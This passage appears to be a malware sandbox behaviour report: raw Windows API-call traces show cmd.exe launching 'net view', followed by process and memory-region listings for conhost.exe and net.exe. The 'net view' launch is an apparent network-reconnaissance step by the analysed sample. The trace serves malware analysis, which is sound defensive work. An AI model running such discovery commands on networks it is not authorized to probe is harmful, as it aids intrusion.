-2 [0263.579] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0263.579] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0263.579] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0263.579] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0263.579] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0263.579] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0263.580] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0263.580] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0263.580] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0263.580] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0263.580] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0263.580] _wcsicmp (_String1="net", _String2="CD") returned 11 [0263.580] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0263.580] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0263.580] _wcsicmp (_String1="net", _String2="REN") returned -4 [0263.580] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0263.580] _wcsicmp (_String1="net", _String2="SET") returned -5 [0263.580] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0263.580] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0263.580] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0263.580] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0263.580] _wcsicmp (_String1="net", _String2="MD") returned 1 [0263.580] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0263.580] _wcsicmp (_String1="net", _String2="RD") returned -4 [0263.580] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0263.580] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0263.580] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0263.580] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0263.580] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0263.580] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0263.580] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0263.580] _wcsicmp (_String1="net", _String2="VER") returned -8 [0263.580] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0263.580] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0263.580] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0263.580] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0263.580] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0263.580] _wcsicmp (_String1="net", _String2="START") returned -5 [0263.580] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0263.580] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0263.580] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0263.581] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0263.581] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0263.581] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0263.581] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0263.581] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0263.581] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0263.581] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0263.581] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0263.581] _wcsicmp (_String1="net", _String2="IF") returned 5 [0263.581] _wcsicmp (_String1="net", _String2="REM") returned -4 [0263.581] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0263.581] SetErrorMode (uMode=0x0) returned 0x0 [0263.581] SetErrorMode (uMode=0x1) returned 0x0 [0263.581] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2a32766560, lpFilePart=0x2a325bf0a0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2a325bf0a0*="system32") returned 0x13 [0263.582] SetErrorMode (uMode=0x0) returned 0x1 [0263.582] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0263.582] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0263.587] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0263.588] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0263.588] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x2a325bee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a325bee20) returned 0x2a327668f0 [0263.588] FindClose (in: hFindFile=0x2a327668f0 | out: hFindFile=0x2a327668f0) returned 1 [0263.588] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x2a325bee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a325bee20) returned 0xffffffffffffffff [0263.588] GetLastError () returned 0x2 [0263.588] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x2a325bee20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2a325bee20) returned 0x2a327668f0 [0263.589] FindClose (in: hFindFile=0x2a327668f0 | out: hFindFile=0x2a327668f0) returned 1 [0263.589] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0263.589] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0263.589] GetConsoleTitleW (in: lpConsoleTitle=0x2a325bf380, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0263.589] InitializeProcThreadAttributeList (in: lpAttributeList=0x2a325bf2a0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2a325bf1a0 | out: lpAttributeList=0x2a325bf2a0, lpSize=0x2a325bf1a0) returned 1 [0263.589] UpdateProcThreadAttribute (in: lpAttributeList=0x2a325bf2a0, dwFlags=0x0, Attribute=0x60001, lpValue=0x2a325bf18c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2a325bf2a0, lpPreviousValue=0x0) returned 1 [0263.589] GetStartupInfoW (in: lpStartupInfo=0x2a325bf230 | out: lpStartupInfo=0x2a325bf230*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0263.589] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0263.589] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0263.589] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0263.589] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0263.590] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0263.591] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0263.591] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0263.591] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0263.591] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0263.592] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net view ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2a325bf1c0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="net view ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2a325bf1a8 | out: lpCommandLine="net view ", lpProcessInformation=0x2a325bf1a8*(hProcess=0x90, hThread=0x8c, dwProcessId=0x84, dwThreadId=0x4bc)) returned 1 [0263.751] CloseHandle (hObject=0x8c) returned 1 [0263.751] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0263.752] GetEnvironmentStringsW () returned 0x2a327680c0* [0263.752] FreeEnvironmentStringsA (penv="=") returned 1 [0263.752] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0276.074] GetExitCodeProcess (in: hProcess=0x90, lpExitCode=0x2a325bf128 | out: lpExitCode=0x2a325bf128*=0x2) returned 1 [0276.074] CloseHandle (hObject=0x90) returned 1 [0276.074] _vsnwprintf (in: _Buffer=0x2a325bf2e8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2a325bf138 | out: _Buffer="00000002") returned 8 [0276.075] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0276.075] GetEnvironmentStringsW () returned 0x2a327784f0* [0276.075] FreeEnvironmentStringsA (penv="=") returned 1 [0276.075] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0276.075] GetEnvironmentStringsW () returned 0x2a327784f0* [0276.075] FreeEnvironmentStringsA (penv="=") returned 1 [0276.075] DeleteProcThreadAttributeList (in: lpAttributeList=0x2a325bf2a0 | out: lpAttributeList=0x2a325bf2a0) [0276.075] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0276.075] _close (_FileHandle=3) returned 0 [0276.076] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.076] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0276.076] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.076] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0276.076] _get_osfhandle (_FileHandle=0) returned 0x20 [0276.076] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0276.077] SetConsoleInputExeNameW () returned 0x1 [0276.077] GetConsoleOutputCP () returned 0x1b5 [0276.077] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0276.077] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.077] exit (_Code=2) Thread: id = 235 os_tid = 0xf0 Process: id = "26" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x383c0000" os_pid = "0x4fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x978" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2682 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2683 start_va = 0xc75a950000 end_va = 0xc75a96ffff entry_point = 0x0 region_type = private name = "private_0x000000c75a950000" filename = "" Region: id = 2684 start_va = 0xc75a970000 end_va = 0xc75a983fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c75a970000" filename = "" Region: id = 2685 start_va = 0xc75a990000 end_va = 0xc75a9cffff entry_point = 0x0 region_type = private name = "private_0x000000c75a990000" filename = "" Region: id = 2686 start_va = 0x7df5ff7f0000 end_va = 0x7ff5ff7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7f0000" filename = "" Region: id = 2687 start_va = 0x7ff683c30000 end_va = 0x7ff683c52fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff683c30000" filename = "" Region: id = 2688 start_va = 0x7ff683c5b000 end_va = 0x7ff683c5bfff entry_point = 0x0 region_type = private name = "private_0x00007ff683c5b000" filename = "" Region: id = 2689 start_va = 0x7ff683c5e000 end_va = 0x7ff683c5ffff entry_point = 0x0 region_type = private name = "private_0x00007ff683c5e000" filename = "" Region: id = 2690 start_va = 0x7ff6847f0000 end_va = 0x7ff684800fff entry_point = 0x7ff6847f0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2691 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2692 start_va = 0xc75aa70000 end_va = 0xc75ab6ffff entry_point = 0x0 region_type = private name = "private_0x000000c75aa70000" filename = "" Region: id = 2693 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2694 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2695 start_va = 0xc75a950000 end_va = 0xc75a95ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c75a950000" filename = "" Region: id = 2696 start_va = 0xc75a960000 end_va = 0xc75a966fff entry_point = 0x0 region_type = private name = "private_0x000000c75a960000" filename = "" Region: id = 2697 start_va = 0xc75a9d0000 end_va = 0xc75aa0ffff entry_point = 0x0 region_type = private name = "private_0x000000c75a9d0000" filename = "" Region: id = 2698 start_va = 0xc75aa10000 end_va = 0xc75aa10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c75aa10000" filename = "" Region: id = 2699 start_va = 0xc75aa20000 end_va = 0xc75aa26fff entry_point = 0x0 region_type = private name = "private_0x000000c75aa20000" filename = "" Region: id = 2700 start_va = 0xc75aa30000 end_va = 0xc75aa30fff entry_point = 0x0 region_type = private name = "private_0x000000c75aa30000" filename = "" Region: id = 2701 start_va = 0xc75aa40000 end_va = 0xc75aa40fff entry_point = 0x0 region_type = private name = "private_0x000000c75aa40000" filename = "" Region: id = 2702 start_va = 0xc75ab70000 end_va = 0xc75ac2dfff entry_point = 0xc75ab70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2703 start_va = 0xc75adb0000 end_va = 0xc75adbffff entry_point = 0x0 region_type = private name = "private_0x000000c75adb0000" filename = "" Region: id = 2704 start_va = 0xc75adc0000 end_va = 0xc75af47fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c75adc0000" filename = "" Region: id = 2705 start_va = 0xc75af50000 end_va = 0xc75b0d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c75af50000" filename = "" Region: id = 2706 start_va = 0xc75b0e0000 end_va = 0xc75c4dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c75b0e0000" filename = "" Region: id = 2707 start_va = 0x7ff683b30000 end_va = 0x7ff683c2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff683b30000" filename = "" Region: id = 2708 start_va = 0x7ff683c5c000 end_va = 0x7ff683c5dfff entry_point = 0x0 region_type = private name = "private_0x00007ff683c5c000" filename = "" Region: id = 2709 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2710 start_va = 0x7ff9722f0000 end_va = 0x7ff972342fff entry_point = 0x7ff9722f0000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2711 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2712 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2713 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2714 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2715 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2716 start_va = 0x7ff977720000 end_va = 0x7ff977755fff entry_point = 0x7ff977720000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2717 start_va = 0x7ff977760000 end_va = 0x7ff97781dfff entry_point = 0x7ff977760000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2718 start_va = 0x7ff977830000 end_va = 0x7ff977aabfff entry_point = 0x7ff977830000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2719 start_va = 0x7ff977b60000 end_va = 0x7ff977ca0fff entry_point = 0x7ff977b60000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2720 start_va = 0x7ff977df0000 end_va = 0x7ff977f15fff entry_point = 0x7ff977df0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 232 os_tid = 0xb18 Thread: id = 233 os_tid = 0x964 Thread: id = 234 os_tid = 0xec Process: id = "27" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x38922000" os_pid = "0x84" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x978" cmd_line = "net view " cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2731 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2732 start_va = 0x3551ed0000 end_va = 0x3551eeffff entry_point = 0x0 region_type = private name = "private_0x0000003551ed0000" filename = "" Region: id = 2733 start_va = 0x3551ef0000 end_va = 0x3551f03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003551ef0000" filename = "" Region: id = 2734 start_va = 0x3551f10000 end_va = 0x3551f8ffff entry_point = 0x0 region_type = private name = "private_0x0000003551f10000" filename = "" Region: id = 2735 start_va = 0x3551f90000 end_va = 0x3551f93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003551f90000" filename = "" Region: id = 2736 start_va = 0x3551fa0000 end_va = 0x3551fa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003551fa0000" filename = "" Region: id = 2737 start_va = 0x3551fb0000 end_va = 0x3551fb1fff entry_point = 0x0 region_type = private name = "private_0x0000003551fb0000" filename = "" Region: id = 2738 start_va = 0x7df5ff4a0000 end_va = 0x7ff5ff49ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4a0000" filename = "" Region: id = 2739 start_va = 0x7ff74e780000 end_va = 0x7ff74e7a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff74e780000" filename = "" Region: id = 2740 start_va = 0x7ff74e7a4000 end_va = 0x7ff74e7a4fff entry_point = 0x0 region_type = private name = "private_0x00007ff74e7a4000" filename = "" Region: id = 2741 start_va = 0x7ff74e7ae000 end_va = 0x7ff74e7affff entry_point = 0x0 region_type = private name = "private_0x00007ff74e7ae000" filename = "" Region: id = 2742 start_va = 0x7ff74ea20000 end_va = 0x7ff74ea3cfff entry_point = 0x7ff74ea20000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 2743 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2744 start_va = 0x35520e0000 end_va = 0x35521dffff entry_point = 0x0 region_type = private name = "private_0x00000035520e0000" filename = "" Region: id = 2745 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2746 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2747 start_va = 0x3551ed0000 end_va = 0x3551edffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003551ed0000" filename = "" Region: id = 2748 start_va = 0x3551ee0000 end_va = 0x3551ee6fff entry_point = 0x0 region_type = private name = "private_0x0000003551ee0000" filename = "" Region: id = 2749 start_va = 0x3551fc0000 end_va = 0x355207dfff entry_point = 0x3551fc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2750 start_va = 0x3552080000 end_va = 0x3552086fff entry_point = 0x0 region_type = private name = "private_0x0000003552080000" filename = "" Region: id = 2751 start_va = 0x3552090000 end_va = 0x3552092fff entry_point = 0x3552090000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Region: id = 2752 start_va = 0x35520a0000 end_va = 0x35520d1fff entry_point = 0x35520a0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui") Region: id = 2753 start_va = 0x35521e0000 end_va = 0x355225ffff entry_point = 0x0 region_type = private name = "private_0x00000035521e0000" filename = "" Region: id = 2754 start_va = 0x35523c0000 end_va = 0x35523cffff entry_point = 0x0 region_type = private name = "private_0x00000035523c0000" filename = "" Region: id = 2755 start_va = 0x7ff74e680000 end_va = 0x7ff74e77ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff74e680000" filename = "" Region: id = 2756 start_va = 0x7ff74e7ac000 end_va = 0x7ff74e7adfff entry_point = 0x0 region_type = private name = "private_0x00007ff74e7ac000" filename = "" Region: id = 2757 start_va = 0x7ff970e80000 end_va = 0x7ff970e95fff entry_point = 0x7ff970e80000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2758 start_va = 0x7ff9710a0000 end_va = 0x7ff9710b7fff entry_point = 0x7ff9710a0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2759 start_va = 0x7ff971f40000 end_va = 0x7ff971f4afff entry_point = 0x7ff971f40000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2760 start_va = 0x7ff971f50000 end_va = 0x7ff971f87fff entry_point = 0x7ff971f50000 